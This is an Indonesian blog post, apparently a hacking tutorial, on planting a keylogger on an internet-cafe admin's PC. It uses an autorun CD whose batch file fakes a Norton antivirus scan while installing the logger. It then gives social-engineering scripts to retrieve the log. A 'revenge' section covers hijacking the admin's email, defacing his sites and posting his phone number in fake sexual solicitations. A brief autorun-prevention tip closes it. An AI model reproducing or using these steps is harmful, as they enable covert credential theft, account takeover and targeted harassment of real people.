Semakin
paranoidnya para admin belakangan ini menyebabkan banyak pengguan jasa
layanan internet cafe (warnet) menjadi kurang nyaman. Restriction
(pembatasan) disana-sini (walaupun semua itu dilakukan bukan tanpa
alasan) menjadi salah
satu inspirasi
bagi banyak orang untuk mencari-cari cara menerobos segala
keterbatasan itu dan saling men-share pengetahuan mereka. Berbagai
jenis exploit pun dibedah, didiskusikan dan dikemas menjadi
artikel untuk para newbie.
Sejenak para newbie bisa tertawa puas, berjaya, senyum-senyum sendiri sampai
tak
jarang lupa diri :P Namun semua itu tentunya tidak bertahan lama.
Admin menjadi semakn pintar. Fasilitas Floppy drive dan CD room drive
dihapus dan melarang user untuk melakukan segala bentuk transfer
file dari media penyimpanan sementara (disket, cd, flashdisk)
kecuali melalui server terlebih dahulu. Ini merupakan fenomena yang
akhir-akhir ini bisa kita temui dengan mudah di berbagai Internet
cafe. Admin mulai rajin mengupdate patch sehingga exploit-exploit
yang dulu dibangga-banggakan oleh kaum newbie menjadi”rongsokan” tak
berguna. Sekarang, mari kita bangunkan sang admin dari mimpi indahnya
untuk menunjukkan bahwa menjadi paranoid itu adakalanya tidak baik dan
tidak ada system yang 100% secure.
Serangan pertama
Kita
akan menjadi seorang “agen mata-mata” (hehehe.. gw pake istilah ini
biar ente merasa agak sedikit keren) yang akan merekam segala aktivitas
sang admin. Tujuannya.. banyak! dan salah satunya seperti hal yang
banyak diinginkan orang… mendapatkan password sang admin. Partner
kita kali ini adalah navw32.exe, sebuah keyloger dengan icon
Norton AntiVirus yang bisa kamu dapatkan suka-suka dengan harga
cuma-cuma di halaman member www.spyrozone.net. kategori Keyloger.
Setelah kamu download keyloger tersebut, ikuti langkah - langkah
berikut:
—[1 Bukalah Notepad kemudian ketik baris script berikut:
[autorun]
open=nav.bat
Klik [file][save] kemudian pada box save as type, pilih All Files dan pada
form isian name beri nama Autorun.inf lalu klik tombol [save].
—[2 Buka lembar baru pada notepad dengan klik menu [file] [new] lalu ketik
script berikut:
@echo off
echo Norton Antivirus 2010
echo Scanning disk drive...
echo Please wait...
copy navw32.exe %windir%\navw32.exe
call %windir%\navw32.exe
echo.
echo.
echo.
echo.
echo.
echo.
echo.
echo. Scanning complette! No virus threat detected!
echo.
cls
Klik [file][save] kemudian pada box
save as type, pilih All Files dan pada form isian name beri nama
nav.bat lalu klik tombol [save].
—[3.
Persiapkan beberapa file microsoft word documents (bisa diganti dengan
file lain) sebagai tipuan/alasan untuk di transfer. Semakin banyak
file, semakin baik karena file keyloger kamu akan semakin
tersamarkan.
—[4. Persiapkan sebuah cd
kosong (bekas juga boleh) lalu bakar semua file diatas
(autorun.inf, nav.bat, navw32.exe dan file-file tipuan) kedalam CD.
Sekarang pergilah ke warnet tempat sang admin berkuasa. Bersikaplah
seperti biasa dan jangan gugup selayaknya para koruptor yang
sering nampang di satasion-stasion TI-PI tanpa rasa malu. Setelah
kamu login ke billing komputer user, datangi sang admin. Katakan
pada beliau, “Mas/mbak/om/tante/, mau transfer file dari cd ini.
Nama filenya blablabla tolong dikirim ke komputer nomor blablabla.”
Begitu CD dimasukkan, saat itulah terjadi sebuah fenomena berikut:
Komputer akan memproses file autorun.inf secara otomatis —> file autorun.inf
akan memproses file nav.bat —>
file nav.bat akan menduplikasi file navw32.exe ke dalam
directory windows dan mengaktivkannya —> Keyloger telah terinstall,
hasil rekamannya akan tersimpan di directory yang sama dengan nama
navw32.dll beratribut hidden. Perlu diketahui bahwa keyloger ini tidak
akan menampilkan kotak dialog dalam
bentuk apapun! So, nggak usah
khawatir bakal ketahuan ;) Sekarang, kamu bisa pulang dengan wajah tanpa
dosa dan mungkin (lagi – lagi) kamu bakalan senyum-senyum sendiri
sambil mengelus-elus jenggot kayak habis menang togel. Lalu
bagaimana cara mengambil file hasil rekaman keyloger di directory
windows sang admin? Ikuti langkah-langkah pada serangan kedua.
Serangan kedua
Dua hari Kemudian, datanglah ke
warnet itu lagi. Bertingkahlakulah secara wajar dan beraktivitas
seperti layaknya user biasa. Setelah selesai berinternet ria,
datangi sang admin, bayarlah biaya browsing seperti biasa lalu
dengan wajah sangat-sangat memelas seperti pengemis di jalanan :)
katakan pada beliau,”Mas/mbak/om/tante/, komputer saya bermasalah neeh.
Menurut pesan Error yang muncul, file navw32.dll yang berada di
directory windows hilang. File tersebut beratribut hidden. Tolong
doong copykan dari komputer ini. Kebetulan versi windowsnya sama
dengan komputer saya..” Tentu saja biasanya sang admin dengan sangat
senang hati akan membantu kamu. Dengan suka rela dan penuh kesadaran
beliau akan mengaktifkan opsi Show All files pada Folder Options dan
mengcopy-kan file navw32.dll dari directory windows tanpa
menyadari bahwa file tersebut bukan file system, namun file hasil
rekaman keyloger.
Berikan
disket/cd/flashdisk mu dan setelah file tersebut tersimpan, ucapkan
beribu terima kasih lalu pulanglah ke rumah. Buka file tersebut di
rumah. Klik 2x pada file lalu ketika muncul kotak dialog open with,
klik opsi select program from a list dan pilih notepad pada daftar
program yang ditampilkan. Sekarang tentunya kamu bisa leluasa membaca
rekaman aktivitas sang admin. Cari password emailnya dan kamu bisa
menuju pada hari pembalasan.
Hari Pembalasan
Pilih hari yang tepat, misalnya malam
jum’at kliwon dimana sang admin mungkin sedang terlelap di rumahnya.
Nyalakan komputermu dan connectlah ke Internet. Namun ada baiknya
kamu lakukan hal ini di warnet agar lebih aman. Carilah warnet
yang buka 24 jam. Berbekal hasil rekaman keyloger tadi, loginlah ke
account email sang admin. Setelah puas menjelajahi emailnya,
subscriblah ke berbagai mailing list besar dengan email tersebut.
Subscribe sebanyak-banyaknya.
Hohoho..
lalu apa lagi nich?? Kalau sang admin punya blog/website pribadi/
account Friendster.. tentu kamu dengan mudah mendapatkan semua
password itu dengan fasilitas forgot password. Kebanyakan penyedia
layanan seperti itu akan mengirimkan password via email. So, setelah
dapat semuanya… heheh… DEFACE ajah ;) Tapi inget lho, halaman lama
harus tetap di backup dan jangan merubah password apapun!! Ada ide yang
sedikit lebih sadis (ini cuma ide lho.. sebaiknya jangan
dilakukan deech..). Daftarkan emailnya ke berbagai situs – situs
porno dan postinglah sebuah pesan singkat, memikat dan “mematikan”.
Berikut contohnya jika milis tersebut berbahasa Indonesia:
Dear all..
gwe lagi nafsu berat neeh, burun
telepon gwe doong sekarang juga!! neeh no telp gwe: 021-blablabla
(masukkan no telp sang admin) gwe tunggu 24 jam lho!! Atau terserah kamu
laah.. saya rasa kamu lebih pintar dalam memilih kata- kata yang
yahuud!! ;D Maka bisa dipastikan malam itu akan menjadi malam
jumat kliwon paling mengerikan bagi sang admin, lebih mengerikan
daripada film-film horor manapun! Telepon rumahnya akan berdering tanpa
henti dibanjiri oleh telepon dari dalam dan luar negeri dengan
maksud pembicaraan yang sudah bisa ditebak apa
maksudnya ;D
Keesokan
harinya, setelah menghadapi malam paling mengerikan itu, sang admin
akan kaget 1/2 hidup 1/2 mati mendapati inboxnya penuh dengan
email-email dari berbagai milis yang beliau sendiri tidak merasa
pernah bergabung dengan milis-milis itu. Dan bisa jadi, saat
beliau sedang sibuk Unsubcribe dari milis-milis tersebut, telepon
rumahnya masih terus – terusan menjerit – jerit dengan jeritan indah
:D
Pencegahan
Jika kamu adalah admin yang tidak mau mengalami nasib seperti diatas, maka setiap kamu menerima CD dari siapapun..
1. Buka windows explorer
2. Tekan-tahan tombol shift sambil memasukkan CD kedalam CD Room dRive.
3. Setelah CD masuk,tetap tekan
tombol shift sampai kira-kira 25 detik.Setelah itu kamu bisa melepas
tombol shift dan mengaksesnya melalui panel sebelah kiri windows
Explorer. Klik pada area folder tree, jangan pada daftar drive sebelah
kanan karena fitur autorun akan aktif. Dan ingat, jangan terlalu
percaya pada siapapun! Ada begitu banyak orang tidak
terduga di sekitar anda!!
Penutup
—[+ Kesimpulan
Bisa kita bayangkan sendiri betapa kelalaian sepele bisa menimbulkan dampak
yang sangat berbahaya. Ini hanya merupakan contoh Social Engineering sederhana
namun dampaknya.. bisa anda bayangkan
sendiri ;) Cara diatas sudah saya coba pada 4 buah warnet di sidoarjo
dan hasilnya saya berhasil mendapatkan catatan aktivitas sang admin
(password etc..). Tapi untuk penerapan “PEMBALASAN” tentu saya tidak
melakukan hal sekejam itu ;P
^Baca juga artikel lainnya..
0 komentar:
Posting Komentar